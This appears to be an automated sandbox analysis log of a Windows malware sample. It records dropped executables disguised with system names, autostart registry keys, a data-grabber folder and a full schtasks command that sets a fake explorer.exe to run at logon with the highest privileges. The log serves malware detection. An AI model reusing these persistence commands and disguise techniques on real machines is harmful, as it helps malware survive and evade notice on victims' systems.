                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: scrrun.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Client.exeSection loaded: version.dll
                        Source: C:\Windows\Client.exeSection loaded: dxgidebug.dll
                        Source: C:\Windows\Client.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Client.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Client.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Client.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Client.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\Client.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Client.exeSection loaded: riched20.dll
                        Source: C:\Windows\Client.exeSection loaded: usp10.dll
                        Source: C:\Windows\Client.exeSection loaded: msls31.dll
                        Source: C:\Windows\Client.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Client.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\Client.exeSection loaded: textshaping.dll
                        Source: C:\Windows\Client.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\Client.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\Client.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\Client.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\Client.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\Client.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Client.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Client.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Client.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Client.exeSection loaded: wldp.dll
                        Source: C:\Windows\Client.exeSection loaded: propsys.dll
                        Source: C:\Windows\Client.exeSection loaded: profapi.dll
                        Source: C:\Windows\Client.exeSection loaded: edputil.dll
                        Source: C:\Windows\Client.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Client.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Client.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Client.exeSection loaded: netutils.dll
                        Source: C:\Windows\Client.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Client.exeSection loaded: appresolver.dll
                        Source: C:\Windows\Client.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\Client.exeSection loaded: slc.dll
                        Source: C:\Windows\Client.exeSection loaded: userenv.dll
                        Source: C:\Windows\Client.exeSection loaded: sppc.dll
                        Source: C:\Windows\Client.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Client.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Client.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Client.exeSection loaded: pcacli.dll
                        Source: C:\Windows\Client.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Desktop\Winscreen.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Winscreen.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeDirectory created: C:\Program Files\win.dll
                        Source: Winscreen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Winscreen.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: Winscreen.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: Winscreen.exeStatic file information: File size 4116480 > 1048576
                        Source: Winscreen.exeStatic PE information: Raw size of .$sY is bigger than: 0x100000 < 0x3dfc00
                        Source: Winscreen.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: winload_prod.pdb source: Temp.txt.43.dr
                        Source: Binary string: C:\Users\andre\source\repos\ConsoleApp19\ConsoleApp19\obj\Debug\upx.pdb source: upx.exe, 0000000A.00000000.2128143794.0000000000532000.00000002.00000001.01000000.00000009.sdmp
                        Source: Binary string: ntkrnlmp.pdb source: Temp.txt.43.dr
                        Source: Binary string: winload_prod.pdb\ source: Temp.txt.43.dr
                        Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.43.dr
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Client.exe, 00000022.00000003.2399115015.00000247FD4AC000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000022.00000000.2390162571.00007FF6FDC38000.00000002.00000001.01000000.00000011.sdmp, Client.exe, 00000022.00000003.2443016628.00000247FD4A7000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000022.00000002.4509128570.00007FF6FDC38000.00000002.00000001.01000000.00000011.sdmp, Client.exe.32.dr
                        Source: upx.exe.0.drStatic PE information: 0x8CE0B222 [Wed Nov 23 17:45:06 2044 UTC]
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .&|8
                        Source: C:\Windows\Client.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6008093
                        Source: Winscreen.exeStatic PE information: section name: .?c$
                        Source: Winscreen.exeStatic PE information: section name: .$sY
                        Source: explorer.exe.0.drStatic PE information: section name: .nK\
                        Source: explorer.exe.0.drStatic PE information: section name: .)Fk
                        Source: explorer.exe.0.drStatic PE information: section name: .&|8
                        Source: taskmoder.exe.0.drStatic PE information: section name: .m[{
                        Source: taskmoder.exe.0.drStatic PE information: section name: ..su
                        Source: taskmoder.exe.0.drStatic PE information: section name: .cBp
                        Source: taskmen.exe.0.drStatic PE information: section name: .BYK
                        Source: taskmen.exe.0.drStatic PE information: section name: .7'g
                        Source: taskmen.exe.0.drStatic PE information: section name: .{a"
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1127F pushad ; ret 0_2_00007FF848F11280
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F106A9 pushfd ; iretd 0_2_00007FF848F106AA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF0835 pushfd ; retf 2_2_00007FF848FF0837
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF2316 push 8B485F93h; iretd 2_2_00007FF848FF231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF2185 pushfd ; retf 2_2_00007FF848FF2187
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF33D5 pushfd ; retf 2_2_00007FF848FF33D7
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F562D8 push cs; ret 7_2_00007FF848F5621F
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F561F2 push cs; ret 7_2_00007FF848F5621F
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848DED2A5 pushad ; iretd 11_2_00007FF848DED2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F0B238 push esp; retf 4810h11_2_00007FF848F0B2A7
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F0ADF8 push E956B5A2h; ret 11_2_00007FF848F0AE29
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F0AE3D push E956B5A2h; ret 11_2_00007FF848F0AE29
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F0B99A push E85919D7h; ret 11_2_00007FF848F0BAF9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848FD2316 push 8B485F95h; iretd 11_2_00007FF848FD231B
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4CC4A push dword ptr [esp-7Fh]; retf 15_2_00007FF848F4CC5A
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F562D8 push cs; ret 15_2_00007FF848F5621F
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F561F2 push cs; ret 15_2_00007FF848F5621F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A53C8 push eax; iretd 31_2_010A53C9
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_02927488 pushfd ; ret 31_2_029274A1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292A535 pushfd ; ret 31_2_0292A53D
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076AC24D push cs; retf 32_2_076AC25B
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076AD968 pushfd ; iretd 32_2_076AD969
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB53C8 push eax; iretd 33_2_02EB53C9
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC35166 push rsi; retf 34_2_00007FF6FDC35167
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC35156 push rsi; retf 34_2_00007FF6FDC35157
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00756277 push F7AA81F4h; iretd 37_2_0075627C
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00754B3F push rdx; retf 37_2_00754B46
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00752B18 push rsi; ret 37_2_00752B19
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_007566C7 push 0CD1D4A8h; iretd 37_2_007566CC
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00752D8C pushfq ; ret 37_2_00752D8D
                        Source: explorer.exe.0.drStatic PE information: section name: .&|8 entropy: 7.780307696000757
                        Source: taskmoder.exe.0.drStatic PE information: section name: .cBp entropy: 7.47420202037757
                        Source: taskmen.exe.0.drStatic PE information: section name: .{a" entropy: 7.89081037643011

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with benign system names
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
                        Drops executables to the windows directory (C:\Windows) and starts them
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeExecutable created and started: C:\Windows\Client.exe
                        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\temp\swtpd1aw.exe
                        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\temp\ydztkyrb.exe
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Roaming\taskmoder.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Disk.flv.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Local\Temp\taskmen.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Users\user\AppData\Local\Temp\ch1pl1en.gh2Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\ProgramData\Synaptics\taskmen.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeFile created: C:\pastibin.exeJump to dropped file
                        Source: C:\Windows\Client.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Roaming\upx.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Windows\Temp\ydztkyrb.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeFile created: C:\Users\user\AppData\Roaming\Client (1).vmp.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Windows\Temp\swtpd1aw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Users\user\AppData\Roaming\tasklog\taskmen.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\Client.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\ProgramData\Synaptics\taskmen.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Windows\Temp\ydztkyrb.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Windows\Temp\swtpd1aw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\Client.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Users\user\AppData\Local\Temp\ch1pl1en.gh2Jump to dropped file

                        Boot Survival

                        barindex
                        Creates an undocumented autostart registry key
                        Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
                        Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
                        Creates autostart registry keys with suspicious names
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client (1).vmp
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\Desktop\Winscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmoderJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmen
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client (1).vmp
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST
                        Source: C:\Users\user\Desktop\Winscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmoderJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmoderJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmen
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmen
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmen
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskmen
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client (1).vmp
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client (1).vmp

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
